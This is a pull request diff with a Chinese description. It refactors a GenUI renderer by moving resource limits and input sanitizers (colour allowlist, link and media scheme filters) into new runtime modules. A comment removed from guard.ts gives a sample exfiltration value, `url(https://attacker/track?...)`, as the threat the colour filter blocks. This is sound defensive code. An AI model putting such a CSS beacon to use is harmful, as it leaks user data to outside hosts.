### PR TITLE
refactor: extract GenUI runtime foundation modules

### DIFF
--- a/src/client/blocks/advanced.tsx
+++ b/src/client/blocks/advanced.tsx
@@ -7,7 +7,7 @@
 import { memo, useEffect, useId, useMemo, useRef, useState, type ReactNode } from 'react'
 import { CodeBlock, DiffBlock, JsonTree, writeClipboard } from '@deepseek-ai/dsh-client-ui-primitives'
 import css from '../GenuiBlock.module.css'
-import { GENUI_LIMITS } from '../guard.ts'
+import { GENUI_LIMITS } from '../genui-runtime/index.ts'
 import { PlotBlock } from '../PlotBlock.tsx'
 import { renderNode } from './render-node.tsx'
 import type { AnswersState, GenuiBlockProps } from './state.ts'

--- a/src/client/blocks/charts.tsx
+++ b/src/client/blocks/charts.tsx
@@ -5,7 +5,7 @@
  */
 import { memo, useState } from 'react'
 import css from '../GenuiBlock.module.css'
-import { GENUI_LIMITS } from '../guard.ts'
+import { GENUI_LIMITS } from '../genui-runtime/index.ts'
 import type { GenuiChart, GenuiTable } from '../spec.ts'
 
 export const CHART_COLORS = [

--- a/src/client/blocks/diagram/index.tsx
+++ b/src/client/blocks/diagram/index.tsx
@@ -10,7 +10,7 @@
  */
 import { useMemo } from 'react'
 import type { GenuiDiagram } from '../../spec.ts'
-import { GENUI_LIMITS } from '../../guard.ts'
+import { GENUI_LIMITS } from '../../genui-runtime/index.ts'
 import { resolveLayout } from './layout.ts'
 import { routeEdge, labelGeometry, type Box } from './geometry.ts'
 import { resolvePalette, nodeTreatment, edgeStroke, inkAt } from './theme.ts'

--- a/src/client/blocks/forms.tsx
+++ b/src/client/blocks/forms.tsx
@@ -5,7 +5,7 @@
  */
 import { useEffect, useId, useRef, useState } from 'react'
 import css from '../GenuiBlock.module.css'
-import { GENUI_LIMITS } from '../guard.ts'
+import { GENUI_LIMITS } from '../genui-runtime/index.ts'
 import type { AnswersState, GenuiBlockProps, QuestionMeta } from './state.ts'
 import type { GenuiInput, GenuiRadio, GenuiSelect, GenuiSlider, GenuiSubmit, GenuiSwitch, GenuiTextarea } from '../spec.ts'
 

--- a/src/client/blocks/render-node.tsx
+++ b/src/client/blocks/render-node.tsx
@@ -7,7 +7,7 @@
 import { type ReactNode, type ComponentType } from 'react'
 import * as primitives from '@deepseek-ai/dsh-client-ui-primitives'
 import css from '../GenuiBlock.module.css'
-import { GENUI_LIMITS } from '../guard.ts'
+import { GENUI_LIMITS } from '../genui-runtime/index.ts'
 import type { GenuiList, GenuiNode } from '../spec.ts'
 import type { AnswersState, GenuiBlockProps } from './state.ts'
 import { AudioNode, avatarColor, ClickFeedbackButton, VideoNode } from './basic.tsx'

--- a/src/client/genui-runtime/index.ts
+++ b/src/client/genui-runtime/index.ts
@@ -1,0 +1,1 @@
+export { GENUI_LIMITS } from './limits.ts'

--- a/src/client/genui-runtime/limits.ts
+++ b/src/client/genui-runtime/limits.ts
@@ -1,0 +1,54 @@
+/** Resource limits shared by GenUI repair, validation, and rendering. */
+export const GENUI_LIMITS = {
+  /** Maximum nesting depth of the component tree. */
+  maxDepth: 8,
+  /** Maximum total nodes across the whole spec. */
+  maxNodes: 200,
+  /** Maximum length of any plain string field. */
+  maxString: 2000,
+  /** Maximum length of a `code` body. */
+  maxCode: 12_000,
+  /** Maximum length of a mermaid source. */
+  maxMermaid: 8000,
+  /** Maximum `grid` columns. */
+  maxGridCols: 12,
+  /** Maximum `tabs` count. */
+  maxTabs: 12,
+  /** Maximum `accordion` items. */
+  maxAccordionItems: 24,
+  /** Maximum `list` items. */
+  maxListItems: 50,
+  /** Maximum `select`/`radio` options. */
+  maxOptions: 50,
+  /** Maximum `table` rows / columns. */
+  maxTableRows: 50,
+  maxTableCols: 12,
+  /** Maximum `chart` data points per series. */
+  maxChartPoints: 60,
+  /** Maximum `plot` series and per-series parameters. */
+  maxPlotSeries: 8,
+  maxPlotParams: 6,
+  /** Maximum `scene3d` meshes. */
+  maxMeshes: 5,
+  /** Maximum `quiz` options. */
+  maxQuizOptions: 8,
+  /** Maximum `steps` / `timeline` / `breadcrumb` / `keyvalue` entries. */
+  maxSteps: 24,
+  maxTimelineItems: 24,
+  maxBreadcrumbItems: 12,
+  maxKeyValuePairs: 24,
+  /** Maximum `file-tree` nesting. */
+  maxTreeDepth: 6,
+  /** Maximum `diagram` nodes / edges / zones / focal accents. */
+  maxDiagramNodes: 9,
+  maxDiagramEdges: 12,
+  maxDiagramZones: 3,
+  maxDiagramFocal: 2,
+  maxDiagramLabel: 14,
+  /** Maximum depth of an `echart` option object. */
+  maxEChartOptionDepth: 10,
+  /** Maximum length of any single array inside an `echart` option. */
+  maxEChartArrayLen: 500,
+  /** Maximum entries traversed while sanitizing an `echart` option. */
+  maxEChartOptionNodes: 2000,
+} as const

--- a/src/client/genui-runtime/value-utils.ts
+++ b/src/client/genui-runtime/value-utils.ts
@@ -1,0 +1,67 @@
+/** Shared primitive sanitizers used by the GenUI guard. */
+
+/** Is `value` one of `values`? */
+function inEnum<T extends string>(value: unknown, values: readonly T[]): value is T {
+  return typeof value === 'string' && (values as readonly string[]).includes(value)
+}
+
+/** String field: truncate a string to `cap`, or undefined when not a string. */
+export function str(value: unknown, cap: number): string | undefined {
+  return typeof value === 'string' ? value.slice(0, cap) : undefined
+}
+
+/**
+ * Color field: the value lands in an inline `style` (background/stroke) or
+ * THREE.Color. Arbitrary CSS values are an exfiltration channel, so only
+ * literal color formats and host design tokens are accepted.
+ */
+const SAFE_COLOR_RE = /^(?:#[\da-fA-F]{3,8}|rgba?\([^)]{0,64}\)|hsla?\([^)]{0,64}\)|var\(--dsw-[\w-]+(?:,\s*#[0-9a-fA-F]{3,8})?\))$/
+
+export function color(value: unknown): string | undefined {
+  if (typeof value !== 'string') return undefined
+  const normalized = value.trim()
+  return normalized.length <= 64 && SAFE_COLOR_RE.test(normalized) ? normalized : undefined
+}
+
+/** Keep only http(s) and mailto link targets. */
+export function safeHref(value: unknown): string | undefined {
+  if (typeof value !== 'string') return undefined
+  const normalized = value.trim()
+  if (normalized.length > 2048) return undefined
+  return /^https?:\/\//i.test(normalized) || /^mailto:[^@\s]+@[^@\s]+$/i.test(normalized) ? normalized : undefined
+}
+
+/** Keep browser-reachable http(s) or same-origin relative media paths. */
+export function safeMediaSrc(value: unknown): string | undefined {
+  if (typeof value !== 'string') return undefined
+  const normalized = value.trim()
+  if (normalized === '' || normalized.length > 2048) return undefined
+  if (/^https?:\/\//i.test(normalized)) return normalized
+  if (/^[a-z][a-z0-9+.-]*:/i.test(normalized) || /^[/\\]{2}/.test(normalized)) return undefined
+  return normalized
+}
+
+/** Finite-number field: clamp into [min, max], or undefined when not finite. */
+export function num(value: unknown, min: number, max: number): number | undefined {
+  return typeof value === 'number' && Number.isFinite(value) ? Math.min(max, Math.max(min, value)) : undefined
+}
+
+/** Integer field: clamp into [min, max], or undefined when not a finite number. */
+export function int(value: unknown, min: number, max: number): number | undefined {
+  return typeof value === 'number' && Number.isFinite(value) ? Math.min(max, Math.max(min, Math.trunc(value))) : undefined
+}
+
+/** Optional enum field: the value when it matches, otherwise undefined. */
+export function enu<T extends string>(value: unknown, values: readonly T[]): T | undefined {
+  return inEnum(value, values) ? value : undefined
+}
+
+/** Plain object (not array, not null). */
+export function obj(value: unknown): Record<string, unknown> | undefined {
+  return typeof value === 'object' && value !== null && !Array.isArray(value) ? value as Record<string, unknown> : undefined
+}
+
+/** Preserve an optional field only when its value exists. */
+export function opt<K extends string, V>(key: K, value: V | undefined): Partial<Record<K, V>> {
+  return value === undefined ? {} : { [key]: value } as Partial<Record<K, V>>
+}

--- a/src/client/guard.ts
+++ b/src/client/guard.ts
@@ -27,71 +27,11 @@ import {
   TEXT_SIZES, diagnoseUnknownGenuiFields, normalizeGenuiSpec,
 } from './component-schema.ts'
 import type { ComponentFieldKind, ComponentRecordSchema, ComponentSchema, GenuiDiagnostic } from './component-schema.ts'
+import { GENUI_LIMITS } from './genui-runtime/limits.ts'
+import { color, enu, int, num, obj, opt, safeHref, safeMediaSrc, str } from './genui-runtime/value-utils.ts'
 
 export { COMPONENT_SCHEMAS, GENUI_NATIVE_TYPES, diagnoseUnknownGenuiFields, normalizeGenuiSpec } from './component-schema.ts'
 export type { ComponentFieldKind, ComponentSchema, GenuiDiagnostic } from './component-schema.ts'
-
-/** Hard resource limits enforced by repair (and mirrored at render time). */
-export const GENUI_LIMITS = {
-  /** Maximum nesting depth of the component tree. */
-  maxDepth: 8,
-  /** Maximum total nodes across the whole spec. */
-  maxNodes: 200,
-  /** Maximum length of any plain string field. */
-  maxString: 2000,
-  /** Maximum length of a `code` body. */
-  maxCode: 12_000,
-  /** Maximum length of a mermaid source. */
-  maxMermaid: 8000,
-  /** Maximum `grid` columns. */
-  maxGridCols: 12,
-  /** Maximum `tabs` count. */
-  maxTabs: 12,
-  /** Maximum `accordion` items. */
-  maxAccordionItems: 24,
-  /** Maximum `list` items. */
-  maxListItems: 50,
-  /** Maximum `select`/`radio` options. */
-  maxOptions: 50,
-  /** Maximum `table` rows / columns. */
-  maxTableRows: 50,
-  maxTableCols: 12,
-  /** Maximum `chart` data points per series. */
-  maxChartPoints: 60,
-  /** Maximum `plot` series and per-series parameters. */
-  maxPlotSeries: 8,
-  maxPlotParams: 6,
-  /** Maximum `scene3d` meshes. */
-  maxMeshes: 5,
-  /** Maximum `quiz` options. */
-  maxQuizOptions: 8,
-  /** Maximum `steps` / `timeline` / `breadcrumb` / `keyvalue` entries. */
-  maxSteps: 24,
-  maxTimelineItems: 24,
-  maxBreadcrumbItems: 12,
-  maxKeyValuePairs: 24,
-  /** Maximum `file-tree` nesting. */
-  maxTreeDepth: 6,
-  /** Maximum `diagram` nodes / edges / zones / focal accents (editorial
-   * complexity budget, mirroring diagram-design's §7 limits). */
-  maxDiagramNodes: 9,
-  maxDiagramEdges: 12,
-  maxDiagramZones: 3,
-  maxDiagramFocal: 2,
-  maxDiagramLabel: 14,
-
-  /** Maximum depth of an `echart` option object (prevents pathological nested
-   * ECharts configs from stalling the guard walk). */
-  maxEChartOptionDepth: 10,
-  /** Maximum length of any single array inside an `echart` option (prevents
-   * a model from stalling rendering with `series.data` of hundreds of
-   * thousands of points). */
-  maxEChartArrayLen: 500,
-  /** Maximum total entries (object keys + array elements) traversed while
-   * sanitizing an `echart` option. Bounds the walk so a pathologically
-   * large option object cannot stall the guard. */
-  maxEChartOptionNodes: 2000,
-} as const
 
 /** Result of `validateGenuiSpec`. */
 export interface GenuiValidation {
@@ -100,77 +40,7 @@ export interface GenuiValidation {
   errors: string[]
 }
 
-/* ---------------- shared field helpers ---------------- */
-
-/** Is `v` one of `values`? (enum guard) */
-function inEnum<T extends string>(v: unknown, values: readonly T[]): v is T {
-  return typeof v === 'string' && (values as readonly string[]).includes(v)
-}
-
-/** String field: truncate a string to `cap`, or undefined when not a string. */
-function str(v: unknown, cap: number): string | undefined {
-  return typeof v === 'string' ? v.slice(0, cap) : undefined
-}
-
-/**
- * Color field: the value lands in an inline `style` (background/stroke) or
- * THREE.Color. Arbitrary CSS values are an exfiltration channel — a model
- * (or a hostile spec) could emit `url(https://attacker/track?...)` and the
- * browser would fetch it. Only formats that name a color pass: hex, rgb/hsl
- * functions, and host design tokens (`var(--dsw-*)`). Anything else degrades
- * to the component's default palette.
- */
-const SAFE_COLOR_RE = /^(?:#[\da-fA-F]{3,8}|rgba?\([^)]{0,64}\)|hsla?\([^)]{0,64}\)|var\(--dsw-[\w-]+(?:,\s*#[0-9a-fA-F]{3,8})?\))$/
-
-function color(v: unknown): string | undefined {
-  if (typeof v !== 'string') return undefined
-  const s = v.trim()
-  return s.length <= 64 && SAFE_COLOR_RE.test(s) ? s : undefined
-}
-
-/**
- * Link target field: only http(s) and mailto survive. `javascript:`/`data:`
- * and every other scheme degrade to a plain-text node — the model's link is
- * display, not an execution channel.
- */
-function safeHref(v: unknown): string | undefined {
-  if (typeof v !== 'string') return undefined
-  const s = v.trim()
-  if (s.length > 2048) return undefined
-  return /^https?:\/\//i.test(s) || /^mailto:[^@\s]+@[^@\s]+$/i.test(s) ? s : undefined
-}
-
-/** Media loads bytes, so accept only browser-reachable http(s) or same-origin
- * relative paths. Active/local schemes and protocol-relative URLs are
- * rejected. The renderer always keeps playback user-controlled. */
-function safeMediaSrc(v: unknown): string | undefined {
-  if (typeof v !== 'string') return undefined
-  const s = v.trim()
-  if (s === '' || s.length > 2048) return undefined
-  if (/^https?:\/\//i.test(s)) return s
-  if (/^[a-z][a-z0-9+.-]*:/i.test(s) || /^[/\\]{2}/.test(s)) return undefined
-  return s
-}
-
-/** Finite-number field: clamp into [min, max], or undefined when not finite. */
-function num(v: unknown, min: number, max: number): number | undefined {
-  return typeof v === 'number' && Number.isFinite(v) ? Math.min(max, Math.max(min, v)) : undefined
-}
-
-/** Integer field: clamp into [min, max], or undefined when not a finite integer. */
-function int(v: unknown, min: number, max: number): number | undefined {
-  return typeof v === 'number' && Number.isFinite(v) ? Math.min(max, Math.max(min, Math.trunc(v))) : undefined
-}
-
-/** Optional enum field: the value when it matches, otherwise undefined. */
-function enu<T extends string>(v: unknown, values: readonly T[]): T | undefined {
-  return inEnum(v, values) ? v : undefined
-}
-
-/** Plain object (not array, not null). */
-function obj(v: unknown): Record<string, unknown> | undefined {
-  return typeof v === 'object' && v !== null && !Array.isArray(v) ? v as Record<string, unknown> : undefined
-}
+/* ---------------- schema field helpers ---------------- */
 
 function fieldKindMatches(value: unknown, kind: ComponentFieldKind): boolean {
   switch (kind) {
@@ -317,16 +187,6 @@ function validateRegistryFields(
     }
   }
   validateNestedRecordSchemas(value, at, definition, errors)
-}
-
-/**
- * Optional-field spread helper. `exactOptionalPropertyTypes` forbids
- * `{ gap: number | undefined }`; computing the value into a const first and
- * spreading `opt('gap', g)` keeps every optional field either absent or a
- * plain value.
- */
-function opt<K extends string, V>(key: K, value: V | undefined): Partial<Record<K, V>> {
-  return value === undefined ? {} : { [key]: value } as Partial<Record<K, V>>
 }
 
 /* ---------------- repair ---------------- */

--- a/tests/genui-diagram-guard.spec.ts
+++ b/tests/genui-diagram-guard.spec.ts
@@ -1,7 +1,8 @@
 // Editorial diagram guard: repair + validation of the `diagram` node.
 // Pure node tests — no DOM. Mirrors genui-guard.spec.ts style.
 import { describe, expect, it } from 'vitest'
-import { GENUI_LIMITS, repairGenuiSpec, validateGenuiSpec } from '../src/client/guard.ts'
+import { repairGenuiSpec, validateGenuiSpec } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 const diagram = (over: Record<string, unknown>) => ({ type: 'diagram', kind: 'architecture', nodes: [{ id: 'n1', label: 'A' }], ...over })
 

--- a/tests/genui-echart-guard.spec.ts
+++ b/tests/genui-echart-guard.spec.ts
@@ -2,7 +2,8 @@
 // (XSS filter, tooltip renderMode, array/node budget), and node rejection.
 // Pure node tests — no DOM.
 import { describe, expect, it } from 'vitest'
-import { GENUI_LIMITS, repairGenuiSpec } from '../src/client/guard.ts'
+import { repairGenuiSpec } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 const echart = (props: Record<string, unknown> = {}) => ({ type: 'echart', ...props })
 

--- a/tests/genui-gallery.spec.tsx
+++ b/tests/genui-gallery.spec.tsx
@@ -8,7 +8,8 @@ import { afterEach, describe, expect, it } from 'vitest'
 import { hasFenceRegistry } from './setup'
 import { MarkdownText } from '@deepseek-ai/dsh-client-ui-primitives'
 import { gallerySpec } from '../src/client/gallery.ts'
-import { GENUI_LIMITS, repairGenuiSpec } from '../src/client/guard.ts'
+import { repairGenuiSpec } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 afterEach(cleanup)
 

--- a/tests/genui-guard.spec.ts
+++ b/tests/genui-guard.spec.ts
@@ -2,7 +2,8 @@
 // Pure node tests — no DOM. The fence path runs every body through
 // `repairGenuiSpec` before rendering, so these invariants protect the UI.
 import { describe, expect, it } from 'vitest'
-import { GENUI_LIMITS, countDeclaredGenuiNodes, countGenuiNodes, repairGenuiSpec, validateGenuiSpec } from '../src/client/guard.ts'
+import { countDeclaredGenuiNodes, countGenuiNodes, repairGenuiSpec, validateGenuiSpec } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 import { type GenuiNode, type GenuiList, isGenuiSpec, parseGenuiSpec } from '../src/client/spec.ts'
 
 const text = (content: string) => ({ type: 'text', content })

--- a/tests/genui-hardening.spec.tsx
+++ b/tests/genui-hardening.spec.tsx
@@ -7,7 +7,7 @@ import { cleanup, fireEvent, render, screen } from '@testing-library/react'
 import { afterEach, describe, expect, it } from 'vitest'
 import { hasFenceRegistry } from './setup'
 import { MarkdownText } from '@deepseek-ai/dsh-client-ui-primitives'
-import { GENUI_LIMITS } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 afterEach(cleanup)
 

--- a/tests/plugin-tool.spec.ts
+++ b/tests/plugin-tool.spec.ts
@@ -3,7 +3,7 @@
 // spec for the browser toolview).
 import { describe, expect, it, vi } from 'vitest'
 import { createRenderUiTool, createValidateDshUiTool } from '../src/plugin/tool.ts'
-import { GENUI_LIMITS } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 const tool = createRenderUiTool()
 

--- a/tests/templates.spec.ts
+++ b/tests/templates.spec.ts
@@ -5,7 +5,8 @@
  */
 import { describe, expect, it } from 'vitest'
 import { GENUI_TEMPLATES } from '../src/client/templates.ts'
-import { GENUI_LIMITS, validateGenuiSpec, countGenuiNodes } from '../src/client/guard.ts'
+import { validateGenuiSpec, countGenuiNodes } from '../src/client/guard.ts'
+import { GENUI_LIMITS } from '../src/client/genui-runtime/index.ts'
 
 describe('模板中心数据契约', () => {
   it('每条 demo 通过渲染器守卫校验', () => {


### PR DESCRIPTION
## 改动

- 将 `GENUI_LIMITS` 从 `src/client/guard.ts` 提取到 `src/client/genui-runtime/limits.ts`
- 将 `str` / `color` / `safeHref` / `safeMediaSrc` / `num` / `int` / `enu` / `obj` / `opt` 等通用 primitive/security helpers 提取到 `value-utils.ts`
- renderer 与测试直接从 `genui-runtime` 读取 `GENUI_LIMITS`，不再通过 `guard.ts` 间接依赖资源限制
- `guard.ts` 只消费 runtime 基础模块，不再转发 `GENUI_LIMITS`

## 范围

这是一次纯结构整理，目标是降低 `guard.ts` 的职责密度，并改善模块依赖方向。

本 PR **不修改**：

- alias / normalize 行为
- component schema
- repair / sanitize 语义
- validation 语义与错误文案
- 对外公开 API

`GENUI_LIMITS` 并非当前 package exports 或 `./client` 入口暴露的公开 API，因此这里移除的是仓库内部的源码级转发，而不是 breaking public API。

当前改动保持为 1 个 commit；`guard.ts` 只将资源限制和通用 helper 改为 import，没有调整 repair / validate / process 主体行为。

## 验证

- 已复核完整 diff，renderer 侧仅调整 `GENUI_LIMITS` import
- `guard.ts` 不再 re-export `GENUI_LIMITS`，仓库内部相关测试已直接迁移到 `genui-runtime`
- `GENUI_LIMITS` 的数值与 primitive/security helper 的实现保持不变
- GitHub Actions 覆盖 Node 22 / 24 下的 typecheck、完整测试、build、pack verification 与 smoke e2e